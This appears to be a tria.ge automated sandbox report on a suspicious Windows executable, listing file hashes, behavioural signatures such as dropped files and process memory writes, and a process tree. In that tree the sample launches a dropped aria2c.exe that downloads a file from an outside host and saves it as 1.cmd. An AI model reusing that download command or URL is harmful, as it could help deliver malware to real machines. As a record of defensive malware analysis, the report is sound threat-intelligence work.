Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
03/02/2024, 15:33
Static task
static1
Behavioral task
behavioral1
Sample
e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
$0/aria2c.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
$0/aria2c.exe
Resource
win10v2004-20231222-en
General
-
Target
e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe
-
Size
1.9MB
-
MD5
61e62e70e51eeba5c6041960dcbb47a5
-
SHA1
94213db89c31c5314378b2ec6e1859cd83610530
-
SHA256
e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f
-
SHA512
e0c1270ef1252a8d029c383b5de46eef09369ace186eb7f6a43fb925d5dbc492faa9ee116b3f18ecc1cc73d345201b80746d9c501765edc8d5b44a9c3c2e1a0f
-
SSDEEP
49152:peqiGLHnKt1f2LSSlaugdgqeZzD0z2dJDK3Shz4JHbjQHv3RHAygA0:peNGOci2qDCdJWDi+W0
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2628 aria2c.exe -
Loads dropped DLL 3 IoCs
pid Process 2460 e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe 2460 e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe 2680 Process not Found -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2460 wrote to memory of 2628 2460 e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe 28 PID 2460 wrote to memory of 2628 2460 e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe 28 PID 2460 wrote to memory of 2628 2460 e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe 28 PID 2460 wrote to memory of 2628 2460 e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe 28
Processes
-
C:\Users\Admin\AppData\Local\Temp\e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe"C:\Users\Admin\AppData\Local\Temp\e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Users\Administrator\lgx\aria2c.exe"C:\Users\Administrator\lgx\aria2c.exe" --quiet --allow-overwrite=true -d "C:\Users\Administrator\lgx" -o 1.cmd "https://vip.123pan.cn/1814328088/gtx/551.23/ykd"2⤵
- Executes dropped EXE
PID:2628
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.1MB
MD520c51badeab67a2e6ccefe85f8d83ab0
SHA1ea109f1d681c9de61eae24046c1f535a630c8534
SHA256736d6cdbe08e7bacebf30eb027b0cb87602b949d1edfb002217b82204c4a5161
SHA512c81dccee0f841519eabbbd7de44bcd232432e13f95dd769e232c9958ace00fbf3a8fb84a55203279786b04acc85c54a2822e3c11d6b1c172bdea497ead6b7d8b
-
Filesize
462KB
MD5049519830e17964974989a25ea441a7a
SHA195239a050ff5a17d4437754d821f44533edaecf8
SHA2568ec25570234a3a976138e403acad0c95a6f4ce65501aefdc9839d4fc7a6480e4
SHA51244a26abb4709ba46882d3acd363929b63d632346c870256c44cc7ba796aa0e97fbeb5711f832cb3213f548b11f6eb3ed388a4a2b737bd32542b00001f159a5d9
-
Filesize
2.7MB
MD5abf058896acbba8df409057796bbab92
SHA1a96b7bcde090edccb419fea73426451098a129e0
SHA256aab24978671375380140f72ba7a5231e58bb2932dac4c4c9bf0819e55fb59667
SHA5121fe9d903cd854a64961d7345236e611725cd1b3c9ea0506ec67f84313d34729532d8c1283c41b9c3c717e6ae4fd550cab627051459507416799019d6c0752f10
-
Filesize
2.5MB
MD544080066742147dda6133690bb851c20
SHA1226ce45578992b371870b0a093ddb08113ab873b
SHA256a4ea1156c2dd943e3f193698de069f45a0aa6e84756284a9ab35d682f05e2612
SHA5125b0811347afe4d111a0163b92bdbb2519b79b7e0aec71f20a00fb26adfa1cefc06c6024994d1d9242fdaf68586384d9f29005e020f50c778dd328dcc305fc873